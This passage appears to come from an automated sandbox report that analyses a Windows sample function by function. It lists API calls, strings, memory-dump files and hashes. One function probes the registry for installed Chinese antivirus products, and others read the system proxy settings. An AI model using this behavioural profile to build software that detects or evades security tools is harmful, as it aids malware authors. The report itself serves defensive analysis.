                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeProc$Load_strcat_s_strcpy_s$DirectorySystem
                                                                                                                                                • String ID: \ws2_32$\wship6$`ZO$getaddrinfo$pZO$|ZO
                                                                                                                                                • API String ID: 2766041494-2664394553
                                                                                                                                                • Opcode ID: abaf649a4c267fc27b9c80b4b11db1e3b9e87e66ea417b8385becc90f99c1635
                                                                                                                                                • Instruction ID: 470e24e870a4bbc9522796aecfdd697d73249b13842664f9d7f97bd385b23fbd
                                                                                                                                                • Opcode Fuzzy Hash: abaf649a4c267fc27b9c80b4b11db1e3b9e87e66ea417b8385becc90f99c1635
                                                                                                                                                • Instruction Fuzzy Hash: 1F41C5729002089ADB20DF66DC88FEF7AB8FF49744F56452EEA49D7201DB3C8505CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B0680, Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 282COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$_strncmp
                                                                                                                                                • String ID: %25$://$Invalid IPv6 address format$Please URL encode %% as %%25, see RFC 6874.$socks$socks4$socks4a$socks5$socks5h
                                                                                                                                                • API String ID: 3685948395-420296824
                                                                                                                                                • Opcode ID: 8e4f1ce4bb3fb64a4aed56da453e5af3b05d702756399579c05410022f42ae43
                                                                                                                                                • Instruction ID: d95464bbb866e7510533b720aa7b246abe4a72e61584bcd624e6f8fe2bbf81b4
                                                                                                                                                • Opcode Fuzzy Hash: 8e4f1ce4bb3fb64a4aed56da453e5af3b05d702756399579c05410022f42ae43
                                                                                                                                                • Instruction Fuzzy Hash: 349136B1904205AEFB206B318C81BFF7BA9EF51316F24046BF55591282EB7C8A419B7D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041CD8D, Relevance: 29.9, APIs: 1, Strings: 16, Instructions: 190COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041CD92
                                                                                                                                                  • Part of subcall function 00412330: __EH_prolog.LIBCMT ref: 00412335
                                                                                                                                                  • Part of subcall function 00412581: __EH_prolog.LIBCMT ref: 00412586
                                                                                                                                                  • Part of subcall function 004120D2: __EH_prolog.LIBCMT ref: 004120D7
                                                                                                                                                  • Part of subcall function 004120D2: PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000), ref: 00412113
                                                                                                                                                  • Part of subcall function 00412637: __EH_prolog.LIBCMT ref: 0041263C
                                                                                                                                                  • Part of subcall function 0041270B: __EH_prolog.LIBCMT ref: 00412710
                                                                                                                                                  • Part of subcall function 0040D68A: __EH_prolog.LIBCMT ref: 0040D68F
                                                                                                                                                  • Part of subcall function 0040D647: __EH_prolog.LIBCMT ref: 0040D64C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$ExistsFilePath
                                                                                                                                                • String ID: 2345Explorer$360safe$BaiDuAntivirus$BaiDuSafe$DisplayIcon$QQGuanJia$RuiXing$SOFTWARE\2345Explorer$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverGenius$UninstallString$duba$path$qdjl$|P
                                                                                                                                                • API String ID: 3509989144-941706189
                                                                                                                                                • Opcode ID: 091cbeeac2b6faf6585a66d20c92dbadd4f04bb2b964d72b58fefbac58033b0a
                                                                                                                                                • Instruction ID: 285b5647e5067509fdacffb451fc92eb98861bd5fc6fefce4b3b2e7dd5930372
                                                                                                                                                • Opcode Fuzzy Hash: 091cbeeac2b6faf6585a66d20c92dbadd4f04bb2b964d72b58fefbac58033b0a
                                                                                                                                                • Instruction Fuzzy Hash: 73618472D0124CEECB00EBF585866EEBAB59B04318F25816FE511B71C1DBBC9A45875C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040E1FD, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 155registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E202
                                                                                                                                                • _memset.LIBCMT ref: 0040E234
                                                                                                                                                • _memset.LIBCMT ref: 0040E249
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000001,?,?,?,?,?,00000000,0050EB7C), ref: 0040E272
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,ProxyEnable,?,?,?,?,?,00000000,0050EB7C), ref: 0040E298
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,0050EB7C), ref: 0040E2AF
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000001,?,?,?,?,?,00000000,0050EB7C), ref: 0040E2CE
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,ProxyServer,?,?,?,?,00000000,0050EB7C), ref: 0040E3E0
                                                                                                                                                  • Part of subcall function 0040F6CC: RegQueryValueExW.ADVAPI32(00000050,0040DF01,00000000,?,?,?,?,?,0040DF01,00000050), ref: 0040F6EC
                                                                                                                                                • _wcscpy_s.LIBCMT ref: 0040E391
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$Open_memset$H_prologQueryValue_wcscpy_s
                                                                                                                                                • String ID: ProxyEnable$ProxyServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$http=$socks=
                                                                                                                                                • API String ID: 676752552-2154615313
                                                                                                                                                • Opcode ID: 6f2903df03352798eb81c86fc18b64b181ae04729193dd271c9179ecd3719d45
                                                                                                                                                • Instruction ID: 12e751ca2b4c672172519b555a330813ab4efef8d76515500dbba4c9a2bbe59f
                                                                                                                                                • Opcode Fuzzy Hash: 6f2903df03352798eb81c86fc18b64b181ae04729193dd271c9179ecd3719d45
                                                                                                                                                • Instruction Fuzzy Hash: 67511EB1D0121DABCF10EF95DC85AEEBBB8EB44304F50487BE914B3281D7789A448B68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0045C680, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 396COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncmp
                                                                                                                                                • String ID: ,name:$,value:$.\crypto\x509v3\v3_pci.c$file:$hex:$language$pathlen$policy$section:$text:
                                                                                                                                                • API String ID: 909875538-2070401741
                                                                                                                                                • Opcode ID: fdc1b93f25688d0bd9eafcde4b0c5eb53cbb9244fa60177ea7182ac2dcec8d1c
                                                                                                                                                • Instruction ID: 11221705fed23dc97c5242fe261212a475ca65eec05d44b9410ac1f4fffb2b63
                                                                                                                                                • Opcode Fuzzy Hash: fdc1b93f25688d0bd9eafcde4b0c5eb53cbb9244fa60177ea7182ac2dcec8d1c
                                                                                                                                                • Instruction Fuzzy Hash: FBD18B74740340AFE710DF55CC82F6673A5AB98B06F14855AFD089F387E6B8E809CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00421100, Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 435COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncmp
                                                                                                                                                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                • API String ID: 909875538-2733969777
                                                                                                                                                • Opcode ID: 20a175ab4f7ce598e895abd994e9e2644b1e1b7c9569141e9ff058bf25f24b37
                                                                                                                                                • Instruction ID: 0c45283ed44810c87d11ebe5f1a3449959d2784316513a730e5802d856fe7d28
                                                                                                                                                • Opcode Fuzzy Hash: 20a175ab4f7ce598e895abd994e9e2644b1e1b7c9569141e9ff058bf25f24b37
                                                                                                                                                • Instruction Fuzzy Hash: E9F12971704351AFD720EF11E842F6BB3D5AFA4304F48482EF98997242E6B9E905C79B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004030C8, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 260stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004030CD
                                                                                                                                                  • Part of subcall function 00403408: lstrcmpiW.KERNEL32(?,>%@,00403110,?,?,00000000,00000000,>%@,?,00402E90,?,?,00000000,>%@), ref: 00403472
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,>%@,?,00402E90,?,?,00000000,>%@), ref: 0040316A
                                                                                                                                                • CharNextW.USER32(?,?,00402E90,?,?,00000000,>%@), ref: 004031D5
                                                                                                                                                • CharNextW.USER32(00000000,?,00402E90,?,?,00000000,>%@), ref: 004031ED
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharNext$H_prologlstrcmpilstrlen
                                                                                                                                                • String ID: >%@$>%@
                                                                                                                                                • API String ID: 1004901364-4113083449
                                                                                                                                                • Opcode ID: 0f3c6345bc126c1004429ad90b9eb99bd980c29fb9f6093f5a9af529f566e06e
                                                                                                                                                • Instruction ID: 115320d8b23ae8ee68f97ac806c8282907a899bc19e0a8e6f6cd70280732b669
                                                                                                                                                • Opcode Fuzzy Hash: 0f3c6345bc126c1004429ad90b9eb99bd980c29fb9f6093f5a9af529f566e06e
                                                                                                                                                • Instruction Fuzzy Hash: 4291B6719001199BCB20DF65CC86AEE7BBCEB05305F1444BBEA05F32C0DA789F859B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004A63C8, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 164libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 004A63F5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004A6411
                                                                                                                                                  • Part of subcall function 0049AD01: TlsGetValue.KERNEL32(00000000,0049AD76,00000000,004A63D6,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD0E
                                                                                                                                                  • Part of subcall function 0049AD01: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD25
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004A642E
                                                                                                                                                  • Part of subcall function 0049AD01: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD3A
                                                                                                                                                  • Part of subcall function 0049AD01: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0049AD55
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004A6443
                                                                                                                                                • __invoke_watson.LIBCMT ref: 004A6464
                                                                                                                                                  • Part of subcall function 00490470: _memset.LIBCMT ref: 004904FC
                                                                                                                                                  • Part of subcall function 00490470: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 0049051A
                                                                                                                                                  • Part of subcall function 00490470: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00490524
                                                                                                                                                  • Part of subcall function 00490470: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0049052E
                                                                                                                                                  • Part of subcall function 00490470: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 00490549
                                                                                                                                                  • Part of subcall function 00490470: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00490550
                                                                                                                                                  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(00000000,0049AE28), ref: 0049AD85
                                                                                                                                                  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(FFFFFFFF), ref: 0049AD9C
                                                                                                                                                  • Part of subcall function 0049AD78: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0049ADB1
                                                                                                                                                  • Part of subcall function 0049AD78: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0049ADCC
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 004A6478
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004A6490
                                                                                                                                                • __invoke_watson.LIBCMT ref: 004A6503
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                • API String ID: 2940365033-1046234306
                                                                                                                                                • Opcode ID: 6ecef83aa2716730498867a65f2fa2451b8c4b4dbb7a60916def2f5bb06e1577
                                                                                                                                                • Instruction ID: 175471f90c68bc7dc1dda9af0b2fbc4e1290c8f71a04b1b3ef7f9b1878a6a51d
                                                                                                                                                • Opcode Fuzzy Hash: 6ecef83aa2716730498867a65f2fa2451b8c4b4dbb7a60916def2f5bb06e1577
                                                                                                                                                • Instruction Fuzzy Hash: 2141D4B1D00305BBCF20AFB6AC8596F7FA9EF65304B19053FE400D2544DB7D9A548B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041215C, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 144COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 00412161
                                                                                                                                                  • Part of subcall function 00411FE1: __EH_prolog.LIBCMT ref: 00411FE6
                                                                                                                                                  • Part of subcall function 00411FE1: _memset.LIBCMT ref: 0041202F
                                                                                                                                                  • Part of subcall function 00411FE1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,004FC0BC,00000000), ref: 00412052
                                                                                                                                                  • Part of subcall function 00411FE1: PathAddBackslashW.SHLWAPI(?,?,00000000,?,?,004FC0BC,00000000), ref: 0041209E
                                                                                                                                                  • Part of subcall function 00411FE1: RegCloseKey.ADVAPI32(?,00000000), ref: 004120BD
                                                                                                                                                • PathFindExtensionW.SHLWAPI(?,00000022,0000005C), ref: 00412258
                                                                                                                                                • __wcsicmp.LIBCMT ref: 00412271
                                                                                                                                                • __wcsicmp.LIBCMT ref: 00412282
                                                                                                                                                • __wcsicmp.LIBCMT ref: 00412293
                                                                                                                                                  • Part of subcall function 0048EC08: __wcsicmp_l.LIBCMT ref: 0048EC8E
                                                                                                                                                • __wcsicmp.LIBCMT ref: 004122A4
                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(00000000,?,00000000), ref: 004122B8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcsicmp$Path$H_prolog$BackslashCloseExtensionFileFindOpenRemoveSpec__wcsicmp_l_memset
                                                                                                                                                • String ID: .dll$.exe$.ico$.txt$|P
                                                                                                                                                • API String ID: 1384066900-2672057931
                                                                                                                                                • Opcode ID: f25dcf456e3378e61b00b43d838564fbcd831bc2d8cb03531ffb88b1e9166b2c
                                                                                                                                                • Instruction ID: 966b9b1b77f7bbb738d12ad5aebcbd24678f0cdf18a8ca424cc820677e3b7483
                                                                                                                                                • Opcode Fuzzy Hash: f25dcf456e3378e61b00b43d838564fbcd831bc2d8cb03531ffb88b1e9166b2c
                                                                                                                                                • Instruction Fuzzy Hash: 08519331904119ABDF00FFA9CD42AEEBBB4AF00319F10452FF510B72D2D779AA548B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004C1082, Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 339COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 004C1125
                                                                                                                                                • _sscanf.LIBCMT ref: 004C1115
                                                                                                                                                  • Part of subcall function 00490B8E: _vscan_fn.LIBCMT ref: 00490BA3
                                                                                                                                                • _sscanf.LIBCMT ref: 004C11AE
                                                                                                                                                • _sscanf.LIBCMT ref: 004C11D9
                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 004C11FB
                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 004C1208
                                                                                                                                                • GetLastError.KERNEL32 ref: 004C121E
                                                                                                                                                • SetLastError.KERNEL32(?), ref: 004C122A
                                                                                                                                                Strings
                                                                                                                                                • %31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 004C110F
                                                                                                                                                • %02d:%02d:%02d, xrefs: 004C11A8
                                                                                                                                                • %02d:%02d, xrefs: 004C11D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_sscanf$_strlen_vscan_fn
                                                                                                                                                • String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]
                                                                                                                                                • API String ID: 2850275193-241090727
                                                                                                                                                • Opcode ID: 7cc1afb9b62991018564bd398d4c40bc5a538748f3f21e8c5a6020e201d891d3
                                                                                                                                                • Instruction ID: 12915fff1daca1ab2d54d9d84da65a510097f26c74440e22993a7b04dafcb0a0
                                                                                                                                                • Opcode Fuzzy Hash: 7cc1afb9b62991018564bd398d4c40bc5a538748f3f21e8c5a6020e201d891d3
                                                                                                                                                • Instruction Fuzzy Hash: 96C15E79D00259DBDF64DFA9D880BEEBBB4AB09314F24402FE904F7262D7385981CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004BE115, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE14B
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE17A
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004BE1BF
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE1D2
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE201
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004BE218
                                                                                                                                                • __fprintf_l.LIBCMT ref: 004BE22E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
